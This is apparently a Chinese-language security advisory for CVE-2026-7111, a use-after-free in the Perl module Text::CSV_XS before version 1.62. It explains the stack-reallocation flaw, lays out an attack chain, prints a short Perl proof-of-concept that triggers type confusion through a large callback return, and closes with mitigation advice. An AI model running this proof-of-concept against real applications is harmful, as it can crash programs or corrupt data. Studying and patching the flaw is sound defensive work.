CVE-2026-7111 CVSS 8.4 高危

CVE-2026-7111 Text::CSV_XS释放后重用漏洞

披露日期: 2026-04-29

来源: 9b29abf9-4ab0-4765-b253-1875cd9b441e

漏洞信息

漏洞编号

CVE-2026-7111

漏洞类型

释放后重用

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Text::CSV_XS (Perl Module)

漏洞概述

Perl语言的Text::CSV_XS模块在1.62版本之前存在释放后重用漏洞。当注册的回调函数扩展Perl参数堆栈时，会触发该漏洞。受影响的方法包括Parse、print、getline和getline_all。这些方法在调用回调时会缓存堆栈指针，如果回调导致堆栈重新分配，返回值将被写入已释放的缓冲区，导致类型混淆或内存损坏。攻击者可利用此漏洞导致应用程序逻辑错误或崩溃。

技术细节

该漏洞源于Text::CSV_XS在处理回调函数时的内存管理缺陷。当Parse、print等方法调用注册的回调（如after_parse）时，它们会缓存当前的Perl参数堆栈指针。如果回调函数执行期间扩展了参数堆栈，且扩展幅度足以触发Perl内部堆栈的重新分配，原有的堆栈指针将变为悬空指针（指向已释放的内存）。当回调返回时，函数尝试通过这个过时的指针写入返回值，导致数据被写入错误的内存位置。随后，调用者本应读取解析后的数据，但由于指针失效，实际读取到了原始的$self对象（即Text::CSV_XS对象实例）。这种类型混淆使得调用端无法获得预期的CSV数据，进而引发逻辑错误、数据损坏或应用程序崩溃。只有配置了回调函数的使用场景才会受影响。

攻击链分析

STEP 1

步骤1

攻击者诱导受害者使用受影响版本（< 1.62）的Text::CSV_XS模块处理CSV数据。

STEP 2

步骤2

受害者的代码中注册了回调函数（如after_parse），并调用了Parse、print或getline等方法。

STEP 3

步骤3

Text::CSV_XS调用回调函数，并缓存当前的Perl参数堆栈指针。

STEP 4

步骤4

回调函数执行期间扩展了参数堆栈（例如返回大量数据），导致Perl重新分配堆栈内存，使原指针失效。

STEP 5

步骤5

Text::CSV_XS通过失效的指针写入返回值，导致内存破坏或类型混淆，引发程序崩溃或逻辑错误。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/perl
use strict;
use warnings;
use Text::CSV_XS;

# Create a new CSV object
my $csv = Text::CSV_XS->new({ binary => 1 });

# Register a callback that triggers stack growth
# This callback returns a large list to force Perl stack reallocation
$csv->callbacks(
    after_parse => sub {
        # Simulate stack extension by returning a large list
        # This stresses the stack allocator and triggers the UAF condition
        return (1) x 1000; 
    }
);

# CSV input data
my $data = "col1,col2\nval1,val2";
open my $fh, '<', \$data or die "Cannot open string";

# Trigger the vulnerability using getline_all
# This method invokes the callback, causing stack reallocation
# and the subsequent use-after-free write.
my $result = $csv->getline_all($fh);

# Verify if the vulnerability is triggered (Type Confusion)
# If successful, $result is the object itself, not an arrayref of data
if (ref $result eq 'Text::CSV_XS') {
    print "[+] Vulnerability Triggered: Type confusion detected.\n";
    print "    Received Object instead of parsed data.\n";
} else {
    print "[-] Vulnerability not triggered or patched.\n";
}

close $fh;

影响范围

Text::CSV_XS < 1.62

防御指南

临时缓解措施

如果无法立即升级，建议在代码中暂时禁用可能触发堆栈扩展的回调函数，或者确保回调函数不会返回大量数据导致堆栈重分配。同时，应限制对不可信来源的CSV文件进行处理。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表